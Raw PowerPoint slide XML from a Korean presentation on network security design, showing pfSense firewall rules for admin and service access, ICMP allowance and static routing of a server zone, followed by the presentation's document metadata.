        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="-840" b="-840"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8882867" y="1752646"/>
            <a:ext cx="181889" cy="177801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9286193" y="1654103"/>
            <a:ext cx="1330061" cy="29782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Firewall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9286193" y="1888834"/>
            <a:ext cx="1275845" cy="16414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C4B5FD">
                    <a:alpha val="80000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>WAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="C4B5FD">
                    <a:alpha val="80000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>인터페이스 정책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="그룹 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8768489" y="2140090"/>
            <a:ext cx="3119702" cy="1641056"/>
            <a:chOff x="8244209" y="2148762"/>
            <a:chExt cx="3262172" cy="2155646"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Shape 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8255863" y="2148762"/>
              <a:ext cx="3250518" cy="767325"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 18741"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F172A">
                <a:alpha val="3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Text 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8570418" y="2487740"/>
              <a:ext cx="2460984" cy="404601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admin → 10.10.0.100, 10.10.0.102</a:t>
              </a:r>
            </a:p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SSH (TCP/22), HTTPS (TCP/443)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Shape 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8244209" y="2980172"/>
              <a:ext cx="3250518" cy="1281860"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 18741"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F172A">
                <a:alpha val="3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Text 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8570417" y="3296936"/>
              <a:ext cx="2860641" cy="1007472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172.16.0.0/24 → 10.10.0.100</a:t>
              </a:r>
            </a:p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  HTTP (TCP/80)</a:t>
              </a:r>
            </a:p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ANY → 10.10.0.102</a:t>
              </a:r>
            </a:p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  HTTP (TCP/80)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l">
                <a:buNone/>
                <a:defRPr/>
              </a:pP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※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단</a:t>
              </a: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, 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상위 방화벽</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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(pfSense-1)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="900">
                  <a:solidFill>
                    <a:srgbClr val="94A3B8"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>에서 이미 접근 제어 수행</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Text 53"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8570418" y="2231310"/>
              <a:ext cx="1851281" cy="214954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100" b="1">
                  <a:solidFill>
                    <a:srgbClr val="F1F5F9"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>관리 접근 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1">
                  <a:solidFill>
                    <a:srgbClr val="F1F5F9"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>(Admin Access)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Text 54"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8570418" y="3041230"/>
              <a:ext cx="2214621" cy="185631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ko-KR" altLang="en-US" sz="1100" b="1">
                  <a:solidFill>
                    <a:srgbClr val="F1F5F9"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>서비스 접근 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" b="1">
                  <a:solidFill>
                    <a:srgbClr val="F1F5F9"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>(Service Access)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1100"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Image 10" descr="preencoded.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix amt="80000"/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8352585" y="2263282"/>
              <a:ext cx="114300" cy="157693"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="Image 11" descr="preencoded.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix amt="80000"/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8361018" y="3074251"/>
              <a:ext cx="114300" cy="169390"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8598713" y="4820235"/>
            <a:ext cx="3402695" cy="1487968"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1744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9" name="Shape 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8607857" y="4820235"/>
            <a:ext cx="3384207" cy="45719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1" name="Shape 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8598713" y="5410743"/>
            <a:ext cx="3384207" cy="1602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2" name="Shape 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8798967" y="4966919"/>
            <a:ext cx="367121" cy="395373"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 59952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  <a:effectLst>
            <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B82F6">
                <a:alpha val="15000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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903208" y="5072075"/>
            <a:ext cx="165513" cy="178249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9293657" y="4938573"/>
            <a:ext cx="853095" cy="28728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</a:rPr>
              <a:t>Routing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text 83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9293657" y="5214722"/>
            <a:ext cx="798511" cy="158339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sz="900">
                <a:solidFill>
                  <a:srgbClr val="93C5FD">
                    <a:alpha val="80000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>경로 제어</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8768489" y="5511614"/>
            <a:ext cx="3017086" cy="702185"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18741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7" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9101329" y="5805394"/>
            <a:ext cx="2606530" cy="31969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서버존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(10.10.0.0/24)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은 반드시 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pfSense-2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를 거치도록 정적 라우팅 설정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9101330" y="5602190"/>
            <a:ext cx="1269518" cy="18783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정적 라우트 설정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Image 4" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix amt="80000"/>
          </a:blip>
          <a:srcRect l="-1910" r="-1910"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8872729" y="5634482"/>
            <a:ext cx="128536" cy="102083"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8785480" y="3792322"/>
            <a:ext cx="3133649" cy="550679"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18741"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0F172A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2" name="Text 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9092264" y="3838108"/>
            <a:ext cx="1469773" cy="210312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ko-KR" altLang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="F1F5F9"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>네트워크 운영 트래픽</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Image 12" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix amt="80000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8882867" y="3875599"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Text 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9092265" y="4016553"/>
            <a:ext cx="2353505" cy="30801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IPv4 ICMP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허용</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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 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→ 상태 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(Ping), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="94A3B8"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>장애 분석 목적</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="그룹 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="518207" y="1469368"/>
            <a:ext cx="7971588" cy="2988332"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4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5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6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7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8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20667" y="4785360"/>
            <a:ext cx="7948940" cy="1580813"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Shape 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="381305" y="1547165"/>
              <a:ext cx="7563002" cy="4934102"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 429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22D3EE">
                  <a:alpha val="20000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="292100" dist="10160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1" name="Shape 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="37124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2" name="Shape 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371246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Shape 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7763256" y="1537106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Shape 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7934249" y="1537106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Shape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="37124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6" name="Shape 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371246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7" name="Shape 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7763256" y="6467551"/>
              <a:ext cx="190195" cy="19202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8" name="Shape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7934249" y="6295644"/>
              <a:ext cx="19202" cy="190195"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="22D3EE"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="22D3EE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l="5580" t="30650" r="6560" b="21050"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="571499" y="4825065"/>
            <a:ext cx="7853174" cy="148313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3405" t="-232" r="4280" b="18342"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="557633" y="1506140"/>
            <a:ext cx="7888098" cy="29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5203</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>1010</Paragraphs>
  <Slides>64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Google Sans Text</vt:lpstr>
      <vt:lpstr>Noto Sans KR</vt:lpstr>
      <vt:lpstr>굴림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Generated by Gen-Spark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FullName</cp:lastModifiedBy>
  <cp:revision>50</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-21T11:43:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-02T07:07:39Z</dcterms:modified>
  <cp:version/>
</cp:coreProperties>
</file>